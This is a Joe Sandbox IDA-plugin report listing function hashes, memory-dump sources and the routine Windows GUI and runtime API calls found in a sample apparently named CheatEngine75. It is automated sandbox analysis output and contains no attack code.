                                                                                                                                                                                                                                      • Opcode ID: a4d0929d35d1f9d521ae0e6d298ecf2daaef77fbb230aff754a5b8179f2ecaac
                                                                                                                                                                                                                                      • Instruction ID: 8472efd5c826929bfe580710607a8877373792b7fd586802d4a510705e909a21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4d0929d35d1f9d521ae0e6d298ecf2daaef77fbb230aff754a5b8179f2ecaac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 741139F06106199FDB24DF79C911B9E7BE5AF18704F10892EEA69C7640CB78D940CB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTopWindow.USER32(?), ref: 6B4CB9E4
                                                                                                                                                                                                                                      • GetTopWindow.USER32(00000000), ref: 6B4CBA27
                                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 6B4CBA49
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2353593579-0
                                                                                                                                                                                                                                      • Opcode ID: 41ddc6137c5cf1a7895109344abf793337462783ab11f38e72c76e8d9d0a8f70
                                                                                                                                                                                                                                      • Instruction ID: db05a2c529b63a8734b518717ce6504cdddedb0be8910f2780de5d89ba333c8a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41ddc6137c5cf1a7895109344abf793337462783ab11f38e72c76e8d9d0a8f70
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9601A93640151DABCF125F918D05EDF3F2AAF0AB90F005054F95955170C73AC961EB96
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001,?,6B4F1798), ref: 6B4F4F21
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 6B4F4F46
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001,?), ref: 6B4F4F6F
                                                                                                                                                                                                                                      • UpdateWindow.USER32(?), ref: 6B4F4F83
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InvalidateRect$UpdateWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 488614814-0
                                                                                                                                                                                                                                      • Opcode ID: 4228bac3f71cea250b869bfac5457115e8f73e0f301bc1ebf3220b99cc6087e8
                                                                                                                                                                                                                                      • Instruction ID: 0b82debfdbb943b426a1502017b3c4b490b5d122b6ecc639babdb4c30732fc64
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4228bac3f71cea250b869bfac5457115e8f73e0f301bc1ebf3220b99cc6087e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 030108722106009FEB619B59CA44F92B7F9BF48752F010599E19ED72B0DB74E842CB10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6B4CA2F6: GetDlgCtrlID.USER32 ref: 6B4CA307
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 6B4DB9C3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CtrlParent
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 315306666-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 25e68090528e2176e4698315fbc6e3775b266e11bd0b27e80618e95aa2aa49ea
                                                                                                                                                                                                                                      • Instruction ID: 4b9ffc5865ce383f998dc56f195dfba9489e9aef062dff4033f340db5fa175b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25e68090528e2176e4698315fbc6e3775b266e11bd0b27e80618e95aa2aa49ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C941BF35785216CFCB119B28C868FBD77A1FF4A760F0900A5EA16D7390DB38AC42CB91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 6B4F9B0B
                                                                                                                                                                                                                                      • SetFocus.USER32(00000000,?,?,00000000,?,6B4F8FBE,?,?,?,00000000,00000007,?,?,?,6B501BB2,?), ref: 6B4F9B16
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FocusWindow
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 348293334-1841850333
                                                                                                                                                                                                                                      • Opcode ID: c15c5f9e2fc590835e4d27e32f70917d4977c4e59ec845f9793194de9ddbf5a4
                                                                                                                                                                                                                                      • Instruction ID: e1f074b1b50501dc5d5454bea2a1c315dddd9ffd7e71c3c9c99c309a92369610
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c15c5f9e2fc590835e4d27e32f70917d4977c4e59ec845f9793194de9ddbf5a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5621DE71700701ABDB089F29D884F5AB77DFF89324B04466AE50987746D776F892CBE0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$Client
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 2075624825-1841850333
                                                                                                                                                                                                                                      • Opcode ID: df1b0f4691ca218b73e282f0891ee314d416a59eae9f77aaa0f44e0b47aa5975
                                                                                                                                                                                                                                      • Instruction ID: 5b3a472614d303ec8e9b835662a45b80aa95deb088a9c2e41f008c5fb2b46cb4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df1b0f4691ca218b73e282f0891ee314d416a59eae9f77aaa0f44e0b47aa5975
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5211971901209DFCF05DFB8C990EEE7BB9EF49245B0040BAD809EB251DB399905CB60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 6B4CBBE4
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 6B4CBC2B
                                                                                                                                                                                                                                        • Part of subcall function 6B4CBC4E: SetWindowLongW.USER32(?,000000FC,Function_0000781E), ref: 6B4CBC92
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemLongParentWindow
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 869538736-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 685ada596e531f4ecfd07b49f18dc4a63d7e2b2b72bb9a4b06fde455c2e86e2a
                                                                                                                                                                                                                                      • Instruction ID: 46bbdbe71ac25344865ca169b3ba89ddac96ee5fa54f0df06cce0a7b61f54ed0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 685ada596e531f4ecfd07b49f18dc4a63d7e2b2b72bb9a4b06fde455c2e86e2a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15018C39700609ABDB095B36CD01E6AB7A9EF49A41700007DE802D3261EF78EE008B91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CopyInfoMonitorRect
                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                      • API String ID: 2119610155-3887548279
                                                                                                                                                                                                                                      • Opcode ID: c961785fe197df13f06358a6cfe663e7fdd31172a93ab3df4696b7f65ce70633
                                                                                                                                                                                                                                      • Instruction ID: a1ee307639a5a782131ea49d48e8467d719ee5416338adada33609b29a7ce447
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c961785fe197df13f06358a6cfe663e7fdd31172a93ab3df4696b7f65ce70633
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D211D3B5A00609DFCB10DFA9D580D9EB7F9FB09240B508859E496E7200D734FA85CB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 6B4EEB43
                                                                                                                                                                                                                                        • Part of subcall function 6B4EF3D3: __EH_prolog3.LIBCMT ref: 6B4EF3DA
                                                                                                                                                                                                                                        • Part of subcall function 6B4EF3D3: SendMessageW.USER32(?,000000B0,?,?), ref: 6B4EF41D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,0000002E,?), ref: 6B4EEB87
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$H_prolog3State
                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                      • API String ID: 1947833932-248832578
                                                                                                                                                                                                                                      • Opcode ID: 5899aff360f8a0e5490019af948f551f76263ef1b3480e62fe3f7820314bcf22
                                                                                                                                                                                                                                      • Instruction ID: 5a0beee206d73ff4bd7af160710a38641675d60a76c16847c91da0f086bfd1b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5899aff360f8a0e5490019af948f551f76263ef1b3480e62fe3f7820314bcf22
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C019A35650208BFDF549F64CC85F9E7B76EB40356F004059E90546260DB798A92DBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6B4D39B4
                                                                                                                                                                                                                                        • Part of subcall function 6B4D3463: TlsAlloc.KERNEL32(?,6B4D39E0,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3482
                                                                                                                                                                                                                                        • Part of subcall function 6B4D3463: InitializeCriticalSection.KERNEL32(6B69434C,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3493
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocCriticalH_prolog3InitializeSection
                                                                                                                                                                                                                                      • String ID: 0#Lk$0Cik
                                                                                                                                                                                                                                      • API String ID: 2369468792-2259712927
                                                                                                                                                                                                                                      • Opcode ID: 45b20c88f28d3f74c29604d72d72579f3b858184c1a0160f420d3cd388b1305f
                                                                                                                                                                                                                                      • Instruction ID: 527f6b714bd9ee19b4e7e78208311938cd6ddaf14914fd5a4f6291b739e4d818
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b20c88f28d3f74c29604d72d72579f3b858184c1a0160f420d3cd388b1305f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55015A74B002139BDB34AF7AC966B5E37B1BF51394B00017DE8659B390EB78C942CB84
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 6B4C8870
                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 6B4C8879
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ProcWindow$Call
                                                                                                                                                                                                                                      • String ID: 0#Lk
                                                                                                                                                                                                                                      • API String ID: 2316559721-1841850333
                                                                                                                                                                                                                                      • Opcode ID: 6488681df098e30b92e090ea7609f75237be248b03772bad2491ca759ad2e859
                                                                                                                                                                                                                                      • Instruction ID: 00ec3e0bd6cf74e7ae748b8d5aa5acf5efa05b3d533cab983846703628508cb5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6488681df098e30b92e090ea7609f75237be248b03772bad2491ca759ad2e859
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1F01D36200115FFCF065F96CC04EAEBB76FF89751B044066F90486A20D735D460EBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(!MNk,?,?,?,?,?,?,6B4E4D21,?,?,?,?,?,?,?,?), ref: 6B4E4F22
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,6B4E4D21,?,?,?,?,?,?,?,?), ref: 6B4E4F34
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$File$LocalSystem
                                                                                                                                                                                                                                      • String ID: !MNk
                                                                                                                                                                                                                                      • API String ID: 1748579591-4111651727
                                                                                                                                                                                                                                      • Opcode ID: 0ca552bf2f2fe8a0d50a77f58c619ad9aeadd6677971d8ab81ba5ab5f642a96a
                                                                                                                                                                                                                                      • Instruction ID: 83a107d54eb74b0ecbce9fb98ddf8dce232842505e388833870e29c09172c848
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ca552bf2f2fe8a0d50a77f58c619ad9aeadd6677971d8ab81ba5ab5f642a96a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67F03071A1010AABDF44EFB5C945EAF73FCAB0968574044699506D7140EE38E6068774
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6B4C2B25
                                                                                                                                                                                                                                        • Part of subcall function 6B601AA1: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6B601AAD
                                                                                                                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 6B4C2B4E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                      • String ID: string too long
                                                                                                                                                                                                                                      • API String ID: 1846318660-2556327735
                                                                                                                                                                                                                                      • Opcode ID: c67eb265ad0636fb6f4264cc5339cfd2d769a126e213efeec6309e861157a38e
                                                                                                                                                                                                                                      • Instruction ID: 3d257ee284170e037c82320d479441309cf280d79763b83338d219ed67a793db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c67eb265ad0636fb6f4264cc5339cfd2d769a126e213efeec6309e861157a38e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1E08CF291031867C214AFA9E802882B79CDE15598754852AF648B7200FB38E58047E5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindActCtxSectionStringW.KERNEL32(?,6B4CE068,00000000,00000000,00000002,Comctl32.dll,00000040), ref: 6B4CDA29
